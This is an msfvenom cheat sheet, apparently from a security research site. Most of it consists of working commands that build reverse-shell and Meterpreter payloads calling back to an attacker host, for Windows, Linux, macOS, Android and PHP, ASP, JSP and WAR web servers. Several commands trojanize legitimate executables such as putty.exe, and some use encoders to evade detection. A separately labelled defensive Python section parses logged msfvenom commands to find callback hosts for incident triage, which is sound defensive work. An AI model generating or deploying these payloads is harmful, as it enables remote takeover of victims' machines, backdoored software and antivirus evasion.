Msfvenom Cheat Sheet

A Cyber Security Research Dumpsite


A quick cheat sheet for Msfvenom

Msfvenom:

Definition

Msfvenom is capable of creating a wide variety of payloads across multiple languages, systems and architectures.

When using msfvenom, you first select the payload you wish to send. (You can see a full list of payloads using the --list option.)

Payloads come in two main categories: staged and stageless. Staged payloads create a small ‘dumb’ stub that is used to pull down the full payload after it is executed. This gives the benefit of a smaller initial payload, but requires outbound TCP communication to complete.

Stageless payloads are larger by comparison but contain everything required in one payload.

Once the payload is selected, an optional encoder can be applied. Encoders can be used to obfuscate the payload from detection or to convert it to a specific format, such as the PHP magic_quotes encoder.

The next step is to apply any parameters, such as bad characters, ports and hosts.

The final stage is to select the language and file output. Msfvenom can output in most common file formats and languages, e.g. exe, elf, php, asp. It can also output the raw shellcode in languages like Python and C.

For a full list of formats, use the --help-formats option along with the -h option.
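For defenders, the structure described above (payload, optional encoder, parameters, output format) can be read back out of a logged command line. The following is an added example, not code from the original page: it parses msfvenom invocations found in shell history or command-line telemetry and extracts the payload, callback host and port, encoder and template. The function names, the constructed sample lines and the staged/stageless naming heuristic (which follows the payload names on this page and does not cover every module) are assumptions of this example.

```python
import shlex

# Flags that take a value, as used in the commands on this page (">" is a history-line redirect).
VALUE_FLAGS = {"-p": "payload", "-e": "encoder", "-f": "format", "-x": "template",
               "-o": "output", "-i": "iterations", "-b": "badchars", ">": "output"}

def is_staged(payload):
    # Heuristic from the names on this page: ".../meterpreter/reverse_tcp" (stage/stager)
    # is staged; an underscore-joined name such as "shell_reverse_tcp" is stageless.
    return payload.rsplit("/", 1)[-1].startswith(("reverse_", "bind_"))

def parse_msfvenom(cmdline):
    """Parse one logged command line; return None if it does not run msfvenom."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                      # unbalanced quote in a truncated log line
        argv = cmdline.split()
    names = [a.rsplit("/", 1)[-1] for a in argv]
    idx = names.index("msfvenom") if "msfvenom" in names else -1
    if idx < 0 or any(n != "sudo" for n in names[:idx]):   # must be the command, not an argument
        return None
    args = argv[idx + 1:]
    rec = {"options": {}, "keep_template": "-k" in args}    # -k accompanies -x on this page
    i = 0
    while i < len(args):
        tok = args[i]
        if tok in VALUE_FLAGS and i + 1 < len(args):
            rec[VALUE_FLAGS[tok]] = args[i + 1]
            i += 2
        else:
            if "=" in tok and not tok.startswith("-"):
                key, value = tok.split("=", 1)
                rec["options"][key.upper()] = value          # page writes both lhost= and LHOST=
            i += 1
    if "payload" in rec:
        rec["staged"] = is_staged(rec["payload"])
    return rec

def triage(lines):
    """Return one record per msfvenom invocation found in the given log lines."""
    return [r for r in map(parse_msfvenom, lines) if r is not None]

# Constructed sample shell-history lines (addresses are from documentation ranges).
SAMPLE = [
    "ls -la /tmp",
    "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.0.2.10 lport=443 -f exe -o shell.exe",
    "sudo /usr/bin/msfvenom -x base.exe -k -p windows/shell_reverse_tcp LHOST=198.51.100.7 LPORT=4444 -e x86/shikata_ga_nai -i 3 -b '\\x00' -f exe > example.exe",
]
```

The LHOST and LPORT values recovered this way are the callback endpoint to search for in network logs, and the output and template file names are the artifacts to look for on disk.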

Cheat Sheet:

Creating a Payload:
msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

  • Examples:
  • Generating a reverse meterpreter shell:
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe
  • Windows x64 stageless reverse shell TCP payload:
    msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe


Check Payload Option:
msfvenom -p [payload] --payload-options

  • Example:
  • msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options

Encoding a Payload:
msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile

Encoders available: (only the excellent ones are listed here; for the rest, check the Jsitech GitHub page) or run:

msfvenom -l encoders

  • Example:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe

Creating a Payload using a Template:
msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile

  • Example:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -x putty.exe -f exe > evilputty.exe

 

More Payloads

Each entry below gives the Command, followed by its Info (what the command creates).

Binaries

A binary payload is a set of binary files, configuration files, batch, or Shell scripts. Binary payload deployment refers to the deployment of a custom binary payload across environments. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Creates a simple TCP Payload for Windows

msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Creates a simple HTTP Payload for Windows

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf

Creates a simple TCP Shell for Linux

msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho

Creates a simple TCP Shell for Mac

msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk

Creates a simple TCP Payload for Android

Web Payloads

msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

Creates a Simple TCP Shell for PHP

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

Creates a Simple TCP Shell for ASP

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

Creates a Simple TCP Shell for JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war

Creates a Simple TCP Shell for WAR

Windows Payloads

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Binds an exe with a Payload (Backdoors an exe)

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe

Creates a simple TCP payload with shikata_ga_nai encoder

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe > example.exe

Binds an exe with a Payload and encodes it

 

More Payloads on: http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

Alternatively, Offensive Security has a good article on msfvenom: